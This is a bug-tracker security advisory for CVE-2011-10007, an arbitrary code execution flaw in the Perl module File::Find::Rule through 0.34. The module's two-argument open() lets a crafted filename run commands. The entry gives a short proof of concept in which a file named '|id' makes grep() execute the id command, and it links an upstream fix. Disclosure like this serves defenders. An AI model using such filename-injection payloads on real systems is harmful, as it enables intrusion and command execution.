Bug 2370424 (CVE-2011-10007) - CVE-2011-10007 perl-file-find-rule: File::Find::Rule Arbitrary Code Execution
Summary: CVE-2011-10007 perl-file-find-rule: File::Find::Rule Arbitrary Code Execution
Keywords:
Status: NEW
Alias: CVE-2011-10007
Product: Security Response
Classification: Other
Component: vulnerability
Version: unspecified
Hardware: All
OS: Linux
high
high
Target Milestone: ---
Assignee: Product Security DevOps Team
QA Contact:
URL:
Whiteboard:
Depends On: 2370473 2370474 2370475 2370476 2370477 2370478
Blocks:
TreeView+ depends on / blocked
 
Reported: 2025-06-05 13:01 UTC by OSIDB Bzimport
Modified: 2025-06-06 13:02 UTC (History)
1 user (show)

Fixed In Version:
Clone Of:
Environment:
Last Closed:
Embargoed:


Attachments (Terms of Use)

Description OSIDB Bzimport 2025-06-05 13:01:14 UTC
File::Find::Rule through 0.34 for Perl is vulnerable to Arbitrary Code Execution when `grep()` encounters a crafted filename.

A file handle is opened with the 2 argument form of `open()` allowing an attacker controlled filename to provide the MODE parameter to `open()`, turning the filename into a command to be executed.

Example:

$ mkdir /tmp/poc; echo > "/tmp/poc/|id"
$ perl -MFile::Find::Rule \
    -E 'File::Find::Rule->grep("foo")->in("/tmp/poc")'
uid=1000(user) gid=1000(user) groups=1000(user),100(users)

Comment 4 Petr Pisar 2025-06-06 08:51:46 UTC
Upstream fix <https://github.com/richardc/perl-file-find-rule/pull/4>, allegedly included in new 0.35 version.


Note You need to log in before you can comment on or make changes to this bug.